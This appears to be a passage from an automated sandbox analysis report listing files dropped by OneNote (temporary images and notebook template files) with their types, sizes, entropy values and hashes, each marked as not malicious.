Preview:	....l...r...1......^...bX.......^...... EMF........h...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC....s...2...+...^.......F...(.......GDIC....s...2.......N.......F...........EMF+@..$..........?...........?.........@........................(E..HB.'E..HB.0'EI.`B.0'EU5.B.0'E..B.'EU5.B..(EU5.B.(EU5.B..(E..B..(EU5.B..(EI.`B.(E..HB..(E..HB.................@..............!.......b...........$...$......>...........>............'......................%.......................;.......U...P........................T...S...S...S...S8..Si..Ti.@Ti.qT8.qT..qT..@T...T..<.......>.......r...1.......N...............%...........$...$......A...........A............"...........F...........EMF+.@..........F...........GDIC....F...(.......GDIC........2.......N.......F...........EMF+@..$..........?...........?.........@.......................}E

C:\Users\user\AppData\Local\Temp\{EDCD2D85-91BB-46A5-8B2C-B857DAD2A1EC}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 171 x 552, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	10056
Entropy (8bit):	7.956064700093514
Encrypted:	false
SSDEEP:	192:edmu1fpj5DVHuooK4EpGLbAdT+dBXYBR8D1V2p6KwoPR6KUX9ojwRpgA:2Pp/B4LbAF+dBo/1E3S6JScpgA
MD5:	E1B57A8851177DD25DC05B50B904656A
SHA1:	96D2E31A325322F2720722973814D2CAED23D546
SHA-256:	2035407A0540E1C4F7934DB08BA4ADD750FCB9A62863DDD9553E7871C81A99E3
SHA-512:	BC7DC1201884E6DAFDC1F9D8E32656BFAEE0BB4905835E09B65299FE2D7C064B27EAA10B531F9BECF970C986E89A5FD8A0B83F508BBA34EB4E38B3F7F5FC623A
Malicious:	false
Preview:	.PNG........IHDR.......(.....!..t....PLTE.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................4.....bKGD....H....cmPPJCmp0712....H.s...#.IDATx^.w`......$..B....... ....fz5..6`l\.8...Nsz{.//y./....{.7}g.....e.....~.......s...f.....%c...6....O.PJ...Y.oi...9..'j.2..6.-

C:\Users\user\AppData\Local\Temp\{F27ADCF0-AD5B-4BE4-88E7-900DC76AAB9D}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 50 x 556, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	977
Entropy (8bit):	7.231269197132181
Encrypted:	false
SSDEEP:	12:6v/7QiFJaY/z+obuqFA4fypjQSbtBK+lcqNGSbb7XTJArRRzN5DjNRkPmu5cCbR2:x0QY7xbjy9pY0JPXLTWroeuCCbX0
MD5:	B7F74C18002A81A578A4EE60C407A8D3
SHA1:	70A7D4BB1B3ADF4397D168AD0D81B286F88EBDE0
SHA-256:	95F59A0433050180D4C0E8858B83363D51BEA6752A8B7CA516A8677854D8F5B6
SHA-512:	13186A7CDCE80BCA9D2238666D6D7A989FA1887EABFA5D8A9A63EEC304DFD4BE8EFF652205FA56E1D1CEE7D3680AF8C70A952AF73AB3C246400E8D4EBECBDBA9
Malicious:	false
Preview:	.PNG........IHDR...2...,........A....PLTE...................................................................................................................................................................................$.y.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^...0.D_.......cck.....%a...X.a0Y...-..!.G...[....(.r.H.$...1 .zq.4V.e\|a.6.X..4..kl.%....=w....6..TN.....{.4..T/.z...../.....3..!~..t.#b..^.....E!.SFb ...-.....^...,..C.!.b...i._c...s.X.w.. lsQH..H.gKc@@...i. ....m...;Ci....@G.; V{..lO..\.R9e$..{.....P...E.+.2.0D.B,..P...56.?......K.6..TN....^z.4..T/.z...../.....3..!~..t.]b........E!.SFb ...-.....^...,..C.!.b...i._c..Y.O...?.9k2.M.?5 .n.P...,...d._..%M?....6....,.1..R.4.a.R.+..U.Q..P...vd..T........j .]@....."..lJ../.90.4...Y. ...9.%...{......Hc%.....i..%M?aG..H....o.q.......4.......X.d9.r..CI.O.5.Ri0?.s\b....w...>/k..4V.)Y....P...vd..T........j .]@....."..lJ../.90..2..MP..l..?....K.X.....IEND.B`.

C:\Users\user\AppData\Local\Temp\{F5856EBE-BC4D-44EB-8754-62BFCC264796}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:13:06], progressive, precision 8, 570x779, components 3
Category:	dropped
Size (bytes):	129887
Entropy (8bit):	7.8877849553452695
Encrypted:	false
SSDEEP:	3072:QS1x1rXglsteJ79wHi4vNQR5yBlUdOSILe9hSj9jeWMPjdlOJ:vvglst1HiwWR5yBA2LeS9jd1
MD5:	737E96E41D79D3BDACE7AB4F8CBF6274
SHA1:	E6202A41A4F86B27D9EBCAEF7670B16C0ED67CF2
SHA-256:	7966F3D8A2D61ECB49A35E163781858E052C0B122A18A1238AFE27B57E2850E8
SHA-512:	D398C8521DB2FB3F8456FE792CF37472F3B851DD7298DB20E2DB79144F8E846D051878E77E5EF5D00E6840EDB90C6E2D97935BC1023A15FC45038CCE731E9895
Malicious:	false
Preview:	......JFIF.....H.H.....iExif..MM..............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:13:06.............................:.......................................................&.(.................................3.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................u.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...W..I:......a....Aa ...w.T.M.v.........3x.......8Y....$.."-..m.I.0~sxB[@..=...:..\.Y?....@O.L;9i..U....?.5">+9.s\Z..vN

C:\Users\user\AppData\Local\Temp\{F80736F3-1930-4BF1-9EDF-AE38719BE892}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 39 x 600, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	2104
Entropy (8bit):	7.252780160030615
Encrypted:	false
SSDEEP:	48:2PPEOtz2P/LJtVRaqBG8qFOPvHlcEXgkuwf+j:2PZFSjJDjqFOPPlXgG+j
MD5:	F6C596F505504044DF1E36BA5DA3F09B
SHA1:	BCF17EC408899B822492B47E307DE638CC792447
SHA-256:	EDBB86F160050FBF1F9860276802BAE292DBFD0BC98E3EA90D43D981E9F0C54A
SHA-512:	E8D067A1932CED8746FE7D665EEC34EA92A98AFF3DF26FFA9DD02742DDEA3C5654124A88A649FA33DB596F96A5FC9CB2C693D03132F1C8B254ACB56DB4763BD8
Malicious:	false
Preview:	.PNG........IHDR...'...X.......:....PLTE.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................{.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^..c.%i.F...m.m.f.m.m.m{&....X...9.....M.WUW.d.N.O...E$...$...)H....n....N.k..v.....v1L[w)w.}..!...Y.X.V.D.......[....;..[..;....

C:\Users\user\AppData\Local\Temp\{F8B18E42-6932-4257-98B6-79B814453535}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	52945
Entropy (8bit):	7.6490972666456765
Encrypted:	false
SSDEEP:	768:cjvqR0XvFaGCTJffi0tgybmWDoTw71kHUAnjvawrlp2+NUO8dWSNl3PF2PjK/q09:cyRffflgybmWoTw1UUADHUbU21MjpAD
MD5:	AD003F032F32FAC4672D4CE237FA5C5B
SHA1:	AE234931B452F0D649D91291763B919CF350EA49
SHA-256:	ADB1EBBE18D6CD8FF08AA9BF5C83CDB83BF9AA179698E34E93DBCDDE12F04D32
SHA-512:	ECA25FA657ECE3A66D3E650628E0F65D3BADD38864C028AB6553950A1A66D7D55482C85E9E565573E9E5AAFA91C2D53235971C644A266D41EB69F8E72E3A843B
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..AQ..aq....".....2....BR#r.b3$...C.Sc%...s5E......................!1.A..Q.aq"...2...#...B...Rb3..$..CSr...6............?......y_N.e.H7?........W..w....k\|...S..d.4.>.RW5z.$.i.)V.O....>o...c..&1.D..O..".ufbb..1...t..u=..K...m...~.....F..-.fb:i..=f..C.w.[{..~.7k....;..:..3....4.....$..m]...}....~q...9T.#..7.~..8...q.N;c..ffo.w...W..d........../t_........lWJE..).>..v;:=....Rrw#.m.n.n...E...vm.J}2N..\|.4...80.#..e....t.J..ZQ.x\|g/....F..e....k+vK...M..W.X.e.L..~...j.....kz....=...n:O.:..[.L,.+R...Y..zKNI....,..{e..U.'...}.......\|..t.]...~...b4......_.i..../.......m...a..n...v.j.?..Rc.$G\|.31..#..$?.........h.w....-... .a.%z..u......u.A....Fm..J.......G..[...w.....:....w/.

C:\Users\user\AppData\Local\Temp\{FB9A47E9-3FB6-4823-8DF3-D0C2E37A9C08}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4744
Entropy (8bit):	0.6502957924249544
Encrypted:	false
SSDEEP:	6:RaH5NH6tYyfB3h1RRXUnfqM+nPFFBl/FK8CJK+aC1BRujlw//0lweI/wL+aC1jR0:RaHz6tYyf9/UfqdnPFFBtvSaDWf/wKan
MD5:	D781BAC754F76D4238682419467BD8C9
SHA1:	4FFECBCD03047D3C468077C76F86A2AD98EDE6FB
SHA-256:	8643AA8556FE841F3D5E9474FF86A8BC218D3C5AAAE79F8C955E889D34373DFB
SHA-512:	3B25FCFD885C15A49F6D72224F871FC5E0606E9D857FC582CE0F8343E0E180050B84DD453B20A7B483A2B0012609505B021BF97C4D61197177747031CF5D97EB
Malicious:	false
Preview:	./.C..vL....W"v_.~..(w@.....cz.................?.....I...............................................................................................................h............................................w ."..I..Y.zR...........F....B..Q..'..............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{FDDA8433-930D-4B3E-9CC9-2955644D64C2}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:05:55], progressive, precision 8, 612x618, components 3
Category:	dropped
Size (bytes):	68633
Entropy (8bit):	7.709776384921022
Encrypted:	false
SSDEEP:	1536:tapXpSTJDOkFGdJdBk/slsbfsw1imaapnbvD8:U2OjJr6b07m1bvD8
MD5:	41241EE59AB7BC9EB34784E3BCE31CB4
SHA1:	98680761A51E9199CF3C89F68B5309FBEC7EE3CB
SHA-256:	035B26DF61855A3F36DBD30FDAB0C157C04C9E8AE2197EA4D4AEB3E82E6A4C2B
SHA-512:	3EE331D5BCEE4AD5D3FC9661D4AB4053F7D351591A094334F963C33C9D0E32CCCABE9334AD7C308108CE99617E064FE848DCD469ACD8D83FBE5C4452DE523D8F
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:05:55.............................d...........j...........................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?../$.W:SZ./...9.....-...u......r.....].c...@W_.7...+......v.+PD.I..-<1.pDn-\.....p.$....0.}V....\..>.~..XN.o..l(E....ik..o.

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\Open Notebook.onetoc2

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	5040
Entropy (8bit):	1.0343707012658498
Encrypted:	false
SSDEEP:	12:RagUbYyfHjYn8hUnS4WrLFFBttK7EW6/iUB1NKB4XIxAS:YgUbYyfH8rS4UtplfTCAS
MD5:	620CF5F82D67976E37434B8B02409464
SHA1:	C438B47AA024D42E663C6D1915AC44C89CAFAC26
SHA-256:	5359B4386D9527E27041B64F2B0589CB2516275AFBA551607EC1532E2D630173
SHA-512:	CC46A71C397F5B81F105986A726182CD3DB41296968982D6C4754F8E1767DEBD79C6BB4A3B0A1220879C4BBF20052C41A9B48908BE6F406BB58A91CC48934FF3
Malicious:	false
Preview:	./.C..vL....W"v_lj..mw.B...z.l..................?.....I.........................................................................].\tH.FQ..Z.qA.......................h............................................~.....B.................l.=.X.D......y.............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\Open Notebook.onetoc2

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	1.2231508109971732
Encrypted:	false
SSDEEP:	24:YUYyfrxEtDIPAf4N6P01+CCASc9lWz1Xtywe:znrxkIPAAN681+7uG9q
MD5:	83FA259243D2E4C99B59939AC2DB5940
SHA1:	0ADB78FCFCAB07E28AE62E537D617FAC5FB1C662
SHA-256:	CDF20C35A969EE40DEBD038C4C185970AA6AEC9DA78F59FD60C07A41C5DE9A54
SHA-512:	C200C2CCCF7C3230714A84496182C25363857ABED4AFA601DC239360477399B8855780F9A606060494B48B103AA845E3155DF50E8BD9D201D50055BD252AD7D0
Malicious:	false
Preview:	./.C..vL....W"v_..].\tH.FQ..Z.q................?.....I..........................................................................h./VC...%...>.!wY....................h...............................................T#.@.L.1.,.C........x..=..I....................................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Open Notebook.onetoc2

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	6496
Entropy (8bit):	1.523991551300699
Encrypted:	false
SSDEEP:	24:YjYyf4S7lRolMtTgG8OrgGDCASuMnSeK6kNfC/XIT2C6ua:Unxhnb0qN+r
MD5:	DDEB2C8D1E6B5336ACEF4581BCFDD7AD
SHA1:	E8A72400C818E348F2D527B841B5F907CF9F585D
SHA-256:	22C46A95AB6CEBAACCB09E7699EADE319235ACF82F31F1CD1F06BC9B3AF04C03
SHA-512:	AD65D754066BDFBC8DC86FF14C19871072906F05CB93017DA37D9C2CA6184E4D39EBB05AAEEA0B39EB343CCD184309C012C9014A0B70297BCF80E41F16FC4111
Malicious:	false
Preview:	./.C..vL....W"v_...h./VC...%...>................?.....I.........................................................................Q1..G..20p.L...H.....................h...........................`................b..^w=O..................$..G..5...K{............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\Open Notebook.onetoc2

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	5040
Entropy (8bit):	1.0442258192952873
Encrypted:	false
SSDEEP:	12:RaVGFYyfHjxhUnSoWsTnPFFBtvSaDW6/wKa0IKaGwh8mAPOXIxAS:YVGFYyfHgSo/ltvSaDza0ZaGwG/WCAS
MD5:	1CF404CB30BFBA04C625FA223DD3CE8B
SHA1:	B170CFF173ABAFA39F744BCEE8CB057C0A0BAD04
SHA-256:	F3EEBB9EDF947BE83E5125FE93B25CF42F48F4BB8AD12C928A6EFCBE37F1EDF1
SHA-512:	3A77FA2E728E287012770E7FA272C8077196F1506CD127FEEB7695D4A8D101840E22D5151581928D41AB262137F4812C0290BB4E19A20F78F863154A7B7AFCDC
Malicious:	false
Preview:	./.C..vL....W"v_6.f..\tF....TcK.................?.....I..........................................................................0.I.F.....xG.A.......................h...........................................]..{..L..IL..0e.........F....B..Q..'..............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\Open Notebook.onetoc2

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	1.2293184898064922
Encrypted:	false
SSDEEP:	24:YcYyfX7ltsUfvhVaZr5UCAScklEIsjbre:jnXlhMZrzLnKm
MD5:	D004F3852C11340619A6986523885F5D
SHA1:	0FD133954F634D1499166EE60A4DBCB92346E862
SHA-256:	B8F8A81AB1CC7BB6CDFA6A30B0EAFA18AFD85E169EB3F165A94050C54E469887
SHA-512:	54D24CCC7E2828B4148C0D5C52172A065D41754CADB44437BFE885B64DC20D2F6C713E5972B79F4B7026493C8819662C6B05F234E6E9E1D5AD30E5A362BA5411
Malicious:	false
Preview:	./.C..vL....W"v_...0.I.F.....xG.................?.....I..........................................................................h./VC...%...>...}....................h.............................................Iu.z'L.................=.....L.G.....t............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\Open Notebook.onetoc2

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	5040
Entropy (8bit):	1.0261136450402
Encrypted:	false
SSDEEP:	12:RaptXtFYyfHjWUnS9co2l9FFBtVW6/87FkTuLlUXIxAS:Y39FYyfHdS9AtVaJsuLWCAS
MD5:	BE9BDEF795E465871E21272C1521FA43
SHA1:	DF4C47094F041E328965C9BA556AD217186E867A
SHA-256:	9675BFA907FBFFC081BFBB2E04A1547BAABAB3CC846E75AF9AC4BEC6F2977B84
SHA-512:	CF16C2C406F2DCB3F98EB807657342BB08906007955D9B57B241D0FD67D7B7E0BD6499A1017F2FF1C82D0F45CF6E2B547898908E4A66D2DBB5EE88C67C55A3DB
Malicious:	false
Preview:	./.C..vL....W"v_U....<wH....y...................?.....I..........................................................................h./VC...%...>F..6....................h.............................................E\6..I....GAyU........#..O...B...T:.M.............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\Open Notebook.onetoc2

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	5040
Entropy (8bit):	1.0400201580407327
Encrypted:	false
SSDEEP:	12:RakmXjYyfHjjhUnSlMsFkFFBt+sQWW6/a9bAXShzXIxAS:YkmTYyfHuSlxst+CiJCAS
MD5:	7A13D22CD077DDCF1F9633AC2C7909CA
SHA1:	A5D5B98B8A563362D5BE55C58247B04087C3F036
SHA-256:	34FD1D0B3B5AACE646E14C5AE07A411C0FB2FD3B230F402F00879DD892D0C64C
SHA-512:	E0510234499AF60A370C79D98733B784F6CCA380513D7D3F62BD26F8D019CEE8671A8FC602B182D98FF3887C90C9A91B1FB68D94086CDCE6C4B11632D357C5F7
Malicious:	false
Preview:	./.C..vL....W"v_.g.%[.E.F..z..................?.....I............................................................................guC.,.y...A.......................h................................................4LJ..C..=.\.........\|..:..J.F.6g.B3............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\Open Notebook.onetoc2

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	1.225587578256221
Encrypted:	false
SSDEEP:	24:YeYyf8lur1tNtBfAbw1CAScFmqflyAyzWe:Bn8lu7pY0gBqfkVz
MD5:	4267AB69A81A5B494C3487ABF675853C
SHA1:	1AAA6FB491E4AE5FDF2FA55ABC92664DB0B13458
SHA-256:	A0E3F035B91C4409AB0A2AB93BBC9BB05B7251BD8FACF38FD125578AC757710C
SHA-512:	4E6063AD47B871B873C48BE876351C40E336FB72C997E592AE821EBB2DA4754D839BDF0B66A708D7AB063758F84C2766C5E42F0285DDF8DACF60EFF1E7EE142E
Malicious:	false
Preview:	./.C..vL....W"v_.....guC.,.y...................?.....I..........................................................................h./VC...%...>.......................h............................................$'...IG..G...).........EC.vJ.F.g.....<............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Open Notebook.onetoc2

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	6208
Entropy (8bit):	1.305575656439594
Encrypted:	false
SSDEEP:	24:YrYyfHdBIt7TgEIBOROI8CAStdwV9Jbtwfq/un:AnHdWFW+tq9JZqt
MD5:	DD47E5DFF8327C73D7A266C05E94C8BA
SHA1:	18428A0D0E6E205614730AB2777E5C6E2AD7BFC6
SHA-256:	9DBF273D842442BCA7D0313931F5935679A86780ECAE5EA1BD93E17A3D65F13C
SHA-512:	EEFFBDC5F0AF726D54AF179B026B62AA235975FA11B32E908AEAA9B607BFA5086B40CC2D3936E6CEBC17B64D0E5E1C592859477AEFBB9DE37FAC58D4B3A22C6D
Malicious:	false
Preview:	./.C..vL....W"v_..Q1..G..20p.L.................?.....I........................................................................T.t..E...#.9.C.......................h...........................@..................G..3L..J%\`.................B....E.#D............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Document Themes\1033\Open Notebook.onetoc2

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	5040
Entropy (8bit):	1.041461209849481
Encrypted:	false
SSDEEP:	12:Ra6JTYyfHjwhUnS6faFFFBtgDM5W6/cMSEMLeFu8vhXIxAS:Y6JTYyfHzS6fa3tgI59SDL0BhCAS
MD5:	D75BC19D1D9F38A4B61673BD929D9338
SHA1:	D626FF06369D89D9E5377AB99F4A0F9142D6F42E
SHA-256:	866E6711DC2519F1E48FB2B6DEF98DBF842F167E4449F6C1743E4E86BF88868D
SHA-512:	4B7335425363658893315D208D1D54523CDDE3864C594FBC53E660D507BFA14EF6EC122639F5DCED9DBD2B804372516EF2AA37E080F6A68119D992E6501DE047
Malicious:	false
Preview:	./.C..vL....W"v_..4.\F.L...>Bv.d................?.....I........................................................................qLC...H.g..F..}A.......................h...........................................;#f...=@...y?.G............N.2K...Y...............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Document Themes\Open Notebook.onetoc2

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	1.2264104442949455
Encrypted:	false
SSDEEP:	12:RarYyfiasUXirFFBtlaHeQHeNWn+J/G8HeWpHeRuhI1WK/WXIxASDk1vkflghou4:YrYyfLMtBfwyuJ1WDCAScvkflXq/e
MD5:	752945FDEC11C38C2CD40828372A3C11
SHA1:	DAA066F528E370A15D3307627D6148FA457BE06E
SHA-256:	6DB2317C31A16ADEA3356377E360C20BFAD268A37E602F672BE2693625B0A050
SHA-512:	E3850BD5A58CB7986F26ECA795B56C8C5D77A620CEF779001DB1701F2F723208AD1DBD5BF4D85193E99A1674D85EC4772E1321F3703257DBE5BD1BBA2FBA98F2
Malicious:	false
Preview:	./.C..vL....W"v_.qLC...H.g..F..}................?.....I.......................................................................saC....L...e....!wY....................h...........................................Z.....jC...D.............'i(,K..RM.:*............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Open Notebook.onetoc2

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	6496
Entropy (8bit):	1.526621045599533
Encrypted:	false
SSDEEP:	24:YisYyf4SGVDtZ8gN9ICASunanSZHkNfCGZXZT/WHN3j6ua:wnxG97N9J4ENthWtTG
MD5:	BD1940A1AD7466091862CBACDA86C6DB
SHA1:	9EDD6AA203C224CF2A41FBCE64888E4D23075F26
SHA-256:	64A648A8592DDBF1F6E2D3691E012FABCBAED0B3A6FB8275F696177B82D1398D
SHA-512:	81EA33BF8D9DB937D336543C2CD9BD62D1678D7F7F94FFEA4D580335BF0E5507B7BDF6234F3AF7BC8AEAD4C24D6CFA06CEFAF35B9D0BDCA16BE5F48FE7DB4FD3
Malicious:	false
Preview:	./.C..vL....W"v_saC....L...e...................?.....I.........................................................................Q1..G..20p.L..Eg.....................h...........................`................Xwn...O...>.A...........Z.4'&.G...!...............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\SmartArt Graphics\1033\Open Notebook.onetoc2

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	5040
Entropy (8bit):	1.035113537276013
Encrypted:	false
SSDEEP:	12:RafMVYyfHj/6HhUnSHEt9FFBt5TW6/V0kNuFblQ6J8XIxAS:YUVYyfHu+SH0th9IGFCAS
MD5:	72E032E989155C739804AE5A97FD4AE1
SHA1:	DC375465424B51CA80EA9FE1D0E12E592260545E
SHA-256:	FCE9B42D3C83C970947CCE4E7896CBC858161025159536A7EC1F941B64DA953A
SHA-512:	1B302C9B9121C02DCA12A89EDA9102393A7CD0FC50C98533B22890661229C0E48D28F16C617B1B344DE9561F2603A3C8C340F2477071C12B34A382118E781CCE
Malicious:	false
Preview:	./.C..vL....W"v_y.g.@8[F.U...z0.................?.....I..........................................................................b:..G.7.Sx..4A.......................h...........................................%U.....J.....%..........3.s'..TH.\..ox&.............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\SmartArt Graphics\Open Notebook.onetoc2

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	1.2309994410381082
Encrypted:	false
SSDEEP:	12:Raq6fYyfiaYUXqEshFFBt+VMWn+J/np/W8IUrOXIxASDk1YlpnKFFOX48c+nIB:YPfYyf3wrtNfbudU6CAScYlpnKFcrze
MD5:	186AC50829DEA37E91566439D9E7B3B3
SHA1:	9DFD4232CBF3E5175B0FF6FD9D1CECEE5F2D71BC
SHA-256:	7D111E7C50B157EAB24B1AEDC8824C74D28849693489551E70E7F27403BB9BD2
SHA-512:	2112868A101B84F860464E8351CD5E2469319BCAD3E14B7766FAC7BE23BC7AC3DBE777F5DFDEEDFAB40518FA97FF8055DD7F7DB432F096A4D875707A0F66E73D
Malicious:	false
Preview:	./.C..vL....W"v_...b:..G.7.Sx..4................?.....I.......................................................................saC....L...e......}....................h...........................................B....;.A...*............w..Z.iLK...m.#..............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Word Document Bibliography Styles\Open Notebook.onetoc2

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	5040
Entropy (8bit):	1.0423806754555094
Encrypted:	false
SSDEEP:	12:RatoicVtYyfHjaNd/UnSKiR8NFFBtNF5W6/yZSi+xI1RXIxAS:YtOVtYyfH4cSatF/evCAS
MD5:	A36CFD00BBEC181131C812DC1F43EC9E
SHA1:	54ED736C2B99911EC9D376FF2288FE3D7AF2165B
SHA-256:	EC6B2CFAF14B63029F6FF768791AC5E5FCA14A91598FA989E132C156CD6FF6ED
SHA-512:	F12B5EA6DD6675460D02EE36130DC1B27877C9333FF274843AC5D3D6B893A6C778C60086A7EA9157DB2673FE3866369B38D583267AD4938011C9E45B3DDE07D5
Malicious:	false
Preview:	./.C..vL....W"v_.r2a.Z.O...4...:................?.....I.......................................................................saC....L...e...F..6....................h................................................r.A...T.-.,........?...w\.B....8.1............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Word Document Building Blocks\1033\Open Notebook.onetoc2

Download File

